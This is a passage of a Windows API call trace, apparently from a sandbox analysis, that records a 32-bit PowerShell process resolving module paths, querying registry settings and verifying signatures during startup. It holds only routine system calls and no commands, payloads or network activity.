lpDistanceToMoveHigh=0x5a0ced0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0ced0*=0) returned 0x0 [0149.972] ReadFile (in: hFile=0x410, lpBuffer=0x29b561c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0cefc, lpOverlapped=0x0 | out: lpBuffer=0x29b561c*, lpNumberOfBytesRead=0x5a0cefc*=0x9e9, lpOverlapped=0x0) returned 1 [0149.972] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0ced0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0ced0*=0) returned 0x9e9 [0149.972] ReadFile (in: hFile=0x410, lpBuffer=0x29b4ba5, nNumberOfBytesToRead=0x217, lpNumberOfBytesRead=0x5a0cefc, lpOverlapped=0x0 | out: lpBuffer=0x29b4ba5*, lpNumberOfBytesRead=0x5a0cefc*=0x0, lpOverlapped=0x0) returned 1 [0149.973] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0ced0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0ced0*=0) returned 0x9e9 [0149.973] ReadFile (in: hFile=0x410, lpBuffer=0x29b561c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0cefc, lpOverlapped=0x0 | out: lpBuffer=0x29b561c*, lpNumberOfBytesRead=0x5a0cefc*=0x0, lpOverlapped=0x0) returned 1 [0149.973] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0ce64, Length=0x20, ResultLength=0x5a0ced4 | out: SystemInformation=0x5a0ce64, ResultLength=0x5a0ced4*=0x0) returned 0xc0000003 [0149.973] GetSystemInfo (in: lpSystemInfo=0x5a0cee0 | out: lpSystemInfo=0x5a0cee0*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0149.974] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ce70 | out: phkResult=0x5a0ce70*=0x3fc) returned 0x0 [0149.974] RegQueryValueExW (in: hKey=0x3fc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0ce8c, lpData=0x0, lpcbData=0x5a0ce88*=0x0 | out: lpType=0x5a0ce8c*=0x0, lpData=0x0, lpcbData=0x5a0ce88*=0x0) returned 0x2 [0149.974] RegCloseKey (hKey=0x3fc) returned 0x0 [0149.974] CloseHandle (hObject=0x410) returned 1 [0149.975] CoCreateGuid (in: pguid=0x5a0cf60 | out: pguid=0x5a0cf60*(Data1=0xe1b8aaf6, Data2=0xe9fd, Data3=0x4b21, Data4=([0]=0xbf, [1]=0xb6, [2]=0x1b, [3]=0x2a, [4]=0xb, [5]=0x85, [6]=0x37, [7]=0xf2))) returned 0x0 [0149.976] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0ccc0 | out: lpPerformanceCount=0x5a0ccc0*=2943478648909) returned 1 [0149.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0149.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0149.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0c9ac) returned 1 [0149.976] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0cc70 | out: lpFileInformation=0x5a0cc70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e8618, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9e9)) returned 1 [0149.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0c9a8) returned 1 [0149.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0149.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0149.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0149.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0149.977] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0c940) returned 1 [0149.977] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0cc04 | out: lpFileInformation=0x5a0cc04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e8618, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9e9)) returned 1 [0149.977] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0c93c) returned 1 [0149.977] CoTaskMemAlloc (cb=0x10) returned 0x655900 [0149.977] CoTaskMemAlloc (cb=0x10) returned 0x5f88d8 [0149.977] CoTaskMemAlloc (cb=0xf0) returned 0x5bccc58 [0149.977] CoTaskMemAlloc (cb=0x30) returned 0x5bc3e58 [0149.977] WinVerifyTrust () returned 0x800b0100 [0149.991] CoTaskMemFree (pv=0x655900) [0149.991] CoTaskMemFree (pv=0x5bc3e58) [0149.991] CryptCATHandleFromStore () returned 0x65b268 [0149.991] WTHelperGetProvSignerFromChain () returned 0x0 [0149.991] CoTaskMemAlloc (cb=0x10) returned 0x655900 [0149.991] CoTaskMemAlloc (cb=0x30) returned 0x5bc3e58 [0149.991] WinVerifyTrust () returned 0x0 [0149.992] CoTaskMemFree (pv=0x5bc3e58) [0149.992] CoTaskMemFree (pv=0x655900) [0149.992] CoTaskMemFree (pv=0x5bccc58) [0149.992] CoTaskMemFree (pv=0x5f88d8) [0149.995] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\en-US\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\en-us\\microsoft.powershell.management.psd1")) returned 0xffffffff [0149.995] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\en\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\en\\microsoft.powershell.management.psd1")) returned 0xffffffff [0149.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0149.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0149.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0149.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0150.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x67 [0150.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml", nBufferLength=0x67, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x66 [0150.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0c3fc) returned 1 [0150.005] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x5a0c6c0 | out: lpFileInformation=0x5a0c6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0150.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0c3f8) returned 1 [0150.005] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0150.005] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0150.006] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x5a0c370, nSize=0xc9 | out: lpBuffer="") returned 0xc5 [0150.009] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0150.010] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0150.010] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x53 [0150.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0c204) returned 1 [0150.010] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0x5a0c4c8 | out: lpFileInformation=0x5a0c4c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0150.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0c200) returned 1 [0150.015] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0150.018] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\keecfmwgj\\documents\\windowspowershell\\modules")) returned 0xffffffff [0150.026] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules" (normalized: "c:\\program files (x86)\\windowspowershell\\modules")) returned 0x10 [0150.027] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0150.027] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x5a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x59 [0150.027] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0c204) returned 1 [0150.027] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0x5a0c4c8 | out: lpFileInformation=0x5a0c4c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0150.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0c200) returned 1 [0150.033] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.commands.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0150.036] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules")) returned 0x10 [0150.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0150.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x5c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x5b [0150.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0c204) returned 1 [0150.038] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0x5a0c4c8 | out: lpFileInformation=0x5a0c4c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0150.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0c200) returned 1 [0150.042] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0150.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xa0 [0150.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0xa0, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x9f [0150.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xa0 [0150.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0xa0, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x9f [0150.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xa0 [0150.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0xa0, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x9f [0150.668] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0d298 | out: phkResult=0x5a0d298*=0x410) returned 0x0 [0150.669] RegQueryValueExW (in: hKey=0x410, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0d2b8, lpData=0x0, lpcbData=0x5a0d2b4*=0x0 | out: lpType=0x5a0d2b8*=0x1, lpData=0x0, lpcbData=0x5a0d2b4*=0x56) returned 0x0 [0150.669] RegQueryValueExW (in: hKey=0x410, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0d2b8, lpData=0x2babc10, lpcbData=0x5a0d2b4*=0x56 | out: lpType=0x5a0d2b8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0d2b4*=0x56) returned 0x0 [0150.669] RegCloseKey (hKey=0x410) returned 0x0 [0150.669] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0d298 | out: phkResult=0x5a0d298*=0x410) returned 0x0 [0150.670] RegQueryValueExW (in: hKey=0x410, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0d2b8, lpData=0x0, lpcbData=0x5a0d2b4*=0x0 | out: lpType=0x5a0d2b8*=0x1, lpData=0x0, lpcbData=0x5a0d2b4*=0x56) returned 0x0 [0150.670] RegQueryValueExW (in: hKey=0x410, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0d2b8, lpData=0x2babf24, lpcbData=0x5a0d2b4*=0x56 | out: lpType=0x5a0d2b8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0d2b4*=0x56) returned 0x0 [0150.670] RegCloseKey (hKey=0x410) returned 0x0 [0150.671] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0d298 | out: phkResult=0x5a0d298*=0x410) returned 0x0 [0150.671] RegQueryValueExW (in: hKey=0x410, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0d2b8, lpData=0x0, lpcbData=0x5a0d2b4*=0x0 | out: lpType=0x5a0d2b8*=0x1, lpData=0x0, lpcbData=0x5a0d2b4*=0x56) returned 0x0 [0150.671] RegQueryValueExW (in: hKey=0x410, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0d2b8, lpData=0x2bac22c, lpcbData=0x5a0d2b4*=0x56 | out: lpType=0x5a0d2b8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0d2b4*=0x56) returned 0x0 [0150.671] RegCloseKey (hKey=0x410) returned 0x0 [0150.671] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0d298 | out: phkResult=0x5a0d298*=0x410) returned 0x0 [0150.672] RegQueryValueExW (in: hKey=0x410, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0d2b8, lpData=0x0, lpcbData=0x5a0d2b4*=0x0 | out: lpType=0x5a0d2b8*=0x1, lpData=0x0, lpcbData=0x5a0d2b4*=0x56) returned 0x0 [0150.672] RegQueryValueExW (in: hKey=0x410, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0d2b8, lpData=0x2bac540, lpcbData=0x5a0d2b4*=0x56 | out: lpType=0x5a0d2b8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0d2b4*=0x56) returned 0x0 [0150.672] RegCloseKey (hKey=0x410) returned 0x0 [0150.672] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0d2e4 | out: phkResult=0x5a0d2e4*=0x410) returned 0x0 [0150.672] RegQueryValueExW (in: hKey=0x410, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0d304, lpData=0x0, lpcbData=0x5a0d300*=0x0 | out: lpType=0x5a0d304*=0x1, lpData=0x0, lpcbData=0x5a0d300*=0x56) returned 0x0 [0150.673] RegQueryValueExW (in: hKey=0x410, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0d304, lpData=0x2bac83c, lpcbData=0x5a0d300*=0x56 | out: lpType=0x5a0d304*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0d300*=0x56) returned 0x0 [0150.673] RegCloseKey (hKey=0x410) returned 0x0 [0150.673] CoTaskMemAlloc (cb=0x20c) returned 0x68ed08 [0150.673] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x68ed08 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0150.674] CoTaskMemFree (pv=0x68ed08) [0150.674] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0150.674] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0150.674] EtwEventActivityIdControl () returned 0x0 [0150.674] SetEvent (hEvent=0x3f0) returned 1 [0150.675] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x5a0d640*=0x3f0, lpdwindex=0x5a0d464 | out: lpdwindex=0x5a0d464) returned 0x0 [0150.675] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0d5cc, nSize=0xc9 | out: lpBuffer="") returned 0x0 [0150.676] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0d738 | out: lpConsoleScreenBufferInfo=0x5a0d738) returned 1 [0150.679] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0d738 | out: lpConsoleScreenBufferInfo=0x5a0d738) returned 1 [0150.734] EtwEventActivityIdControl () returned 0x0 [0150.734] EtwEventActivityIdControl () returned 0x0 [0150.735] EtwEventActivityIdControl () returned 0x0 [0150.772] EtwEventActivityIdControl () returned 0x0 [0150.772] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\en-US\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\en-us\\bitstransfer.psd1")) returned 0xffffffff [0150.772] GetFileAttributesW 